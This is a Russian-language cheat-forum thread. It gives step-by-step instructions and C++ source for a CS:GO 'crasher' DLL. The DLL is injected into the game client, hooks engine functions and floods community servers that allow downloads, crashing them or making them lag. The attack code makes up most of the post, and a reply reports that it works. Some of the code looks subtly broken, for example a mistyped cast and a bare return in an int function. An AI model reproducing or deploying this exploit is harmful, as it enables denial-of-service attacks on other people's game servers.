Outdated Crasher для CS:GO и LUA код

Статус
В этой теме нельзя размещать новые ответы.
Начинающий
Статус
Оффлайн
Регистрация
12 Ноя 2018
Сообщения
14
Реакции[?]
2
Поинты[?]
0

В данном разделе софт не проверяется модераторами, даже популярные пользователи могут в очередном обновлении вшить вирус в чит, поэтому любое использование исключительно на свой страх и риск. В разделе "Проверенные читы для CS:GO" вы можете скачать софт, который был одобрен нашими модераторами. Ссылка: https://yougame.biz/forums/843/

1. Скачать любой 32 бит .DLL инжектор.
2. Скачать dll crasher можно здесь:
Пожалуйста, авторизуйтесь для просмотра ссылки.
VT:
Пожалуйста, авторизуйтесь для просмотра ссылки.

3. Начните CS: пойдите и инжектните crasher.dll в CS: GO.
4. Присоединитесь к серверу сообщества, который имеет sv_allowdownload 1 Если sv_allowdownload равен 0, он не будет работать.
5. Удерживайте DEL для сбоя или нажмите DEL для задержки.

Source code: ( credits to ecb )

sdk::base_client* base_client;
sdk::engine_client* engine_client;
using engine_call = int32_t(__thiscall**)(sdk::engine_client*);
using sum_call = int32_t(__stdcall**)(int32_t);
const auto engine_addr = reinterpret_cast<uintptr_t>(GetModuleHandleA("engine.dll"));
const auto engine_off1 = reinterpret_cast<void(__thiscall*)(uint8_t*)>(engine_addr + 0x238EE0);
const auto engine_off2 = reinterpret_cast<void(__thiscall*)(uint8_t*, const char*)>(engine_addr + 0x19E120);
const auto engine_off3 = reinterpret_cast<void(__thiscall*)(uint8_t*)>(engine_addr + 0x238E60);
uint32_t some_vclient_stuff = **reinterpret_cast<uint32_t***>(
*reinterpret_cast<uint32_t*>(
*reinterpret_cast<uint32_t*>(base_client) + 0x28) + 5);
using orig_func_decl = int32_t(__thiscall*>(void*);
orig_func_decl orig_func = nullptr;
int32_t __fastcall hook_func(void* thisptr, int edx) {
auto mem_alloc = reinterpret_cast<uint8_t*>(VirtualAlloc(nullptr, 0x50, 0x1000, PAGE_EXECUTE_READWRITE));
if(!mem_alloc)
return;

engine_off1(mem_alloc);
engine_off2(mem_alloc + 4, "win//null.wav");
const auto result = (*reinterpret_cast<engine_call>(reinterpret_cast<uintptr_t>(engine_client) + 0x138))(engine_client);
for(auto i = 0; i <= 2500; i++)
(*reinterpret_cast<sum_call>(*reinterpret_cast<uintptr_t*>(mem_alloc) + 0x14))(result + 0x78);
engine_off3(mem_alloc);
VirtualFree(mem_alloc, 0, MEM_RELEASE);
return orig_func(thisptr);
}
void init() {
const auto tmp = reinterpret_cast<orig_func_decl*>(4 * 24 + *some_vclient_stuff);
orig_func = *tmp;
auto old_protect = 0ul;
VirtualProtect(tmp, 4, PAGE_EXECUTE_READWRITE, &old_protect);
*reinterpret_cast<void**>(tmp) = &hook_func;
}
 
Забаненный
Статус
Оффлайн
Регистрация
28 Авг 2018
Сообщения
5
Реакции[?]
3
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Начинающий
Статус
Оффлайн
Регистрация
10 Июл 2017
Сообщения
46
Реакции[?]
4
Поинты[?]
0
Норма, что после нажатия del моментальный краш кс?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу